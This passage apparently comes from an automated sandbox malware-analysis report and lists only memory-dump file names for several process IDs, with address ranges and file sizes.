                                                                                                                                                                                                                                                                                        • memory/4624-1188-0x000001ABA3260000-0x000001ABA326E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                                                                        • memory/4624-1187-0x000001ABA6170000-0x000001ABA61A8000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                                        • memory/4624-1182-0x000001AB88940000-0x000001AB889AE000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          440KB

                                                                                                                                                                                                                                                                                        • memory/4760-2652-0x0000000000BF0000-0x000000000127E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                                        • memory/4760-2643-0x0000000000BF0000-0x000000000127E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                                        • memory/4760-2642-0x0000000000BF0000-0x000000000127E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                                        • memory/4760-2639-0x0000000000BF0000-0x000000000127E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                                        • memory/4848-2668-0x0000000000540000-0x0000000000592000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          328KB

                                                                                                                                                                                                                                                                                        • memory/4848-2673-0x00000000068A0000-0x00000000068F0000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          320KB

                                                                                                                                                                                                                                                                                        • memory/4848-2675-0x0000000006BC0000-0x0000000006D82000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                                                                                        • memory/4848-2676-0x00000000072C0000-0x00000000077EC000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          5.2MB

                                                                                                                                                                                                                                                                                        • memory/4948-1235-0x0000000000BA0000-0x0000000001124000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          5.5MB

                                                                                                                                                                                                                                                                                        • memory/4988-0-0x0000000074E2E000-0x0000000074E2F000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4988-5-0x0000000074E20000-0x00000000755D1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                                        • memory/4988-4-0x0000000074E2E000-0x0000000074E2F000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4988-3-0x0000000074E20000-0x00000000755D1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                                        • memory/4988-2-0x0000000004B20000-0x0000000004BBC000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          624KB

                                                                                                                                                                                                                                                                                        • memory/4988-1-0x0000000000050000-0x0000000000058000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                                                        • memory/5096-2520-0x0000000007C00000-0x0000000007C11000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          68KB

                                                                                                                                                                                                                                                                                        • memory/5096-2500-0x000000006B2F0000-0x000000006B33C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                                        • memory/5096-2477-0x0000000003200000-0x0000000003236000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          216KB

                                                                                                                                                                                                                                                                                        • memory/5096-2480-0x00000000059C0000-0x0000000005FEA000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          6.2MB

                                                                                                                                                                                                                                                                                        • memory/5096-2481-0x0000000006030000-0x0000000006052000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                                                                        • memory/5096-2491-0x00000000061F0000-0x0000000006256000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                                                                        • memory/5096-2490-0x0000000006110000-0x0000000006176000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                                                                        • memory/5096-2492-0x0000000006260000-0x00000000065B7000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          3.3MB

                                                                                                                                                                                                                                                                                        • memory/5096-2494-0x00000000066B0000-0x00000000066CE000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                                        • memory/5096-2509-0x0000000006C70000-0x0000000006C8E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                                        • memory/5096-2528-0x0000000007D30000-0x0000000007D38000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                                                        • memory/5096-2499-0x0000000007880000-0x00000000078B4000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          208KB

                                                                                                                                                                                                                                                                                        • memory/5096-2525-0x0000000007D40000-0x0000000007D5A000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                                                                        • memory/5096-2524-0x0000000007C50000-0x0000000007C65000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          84KB

                                                                                                                                                                                                                                                                                        • memory/5096-2521-0x0000000007C40000-0x0000000007C4E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                                                                        • memory/5096-2519-0x0000000007C80000-0x0000000007D16000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          600KB

                                                                                                                                                                                                                                                                                        • memory/5096-2518-0x0000000007A80000-0x0000000007A8A000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                                                                        • memory/5096-2517-0x00000000079F0000-0x0000000007A0A000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                                                                        • memory/5096-2516-0x0000000008040000-0x00000000086BA000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                                                                                        • memory/5096-2510-0x00000000078C0000-0x0000000007964000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          656KB

                                                                                                                                                                                                                                                                                        • memory/5440-6006-0x00000000004E0000-0x0000000000977000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4.6MB

                                                                                                                                                                                                                                                                                        • memory/6172-4108-0x00000000022E0000-0x00000000022E6000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          24KB

                                                                                                                                                                                                                                                                                        • memory/6172-4107-0x0000000000030000-0x0000000000086000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          344KB

                                                                                                                                                                                                                                                                                        • memory/6172-4109-0x0000000002140000-0x00000000021A2000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          392KB

                                                                                                                                                                                                                                                                                        • memory/6172-4110-0x0000000004880000-0x0000000004886000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          24KB

                                                                                                                                                                                                                                                                                        • memory/6364-4123-0x0000000000380000-0x0000000000743000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          3.8MB

                                                                                                                                                                                                                                                                                        • memory/6364-4139-0x0000000000380000-0x0000000000743000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          3.8MB

                                                                                                                                                                                                                                                                                        • memory/6756-4151-0x0000000000930000-0x000000000096C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                                                                                        • memory/6896-4180-0x0000000000400000-0x00000000005CC000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                                                                                        • memory/6896-4161-0x0000000000400000-0x00000000005CC000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.8MB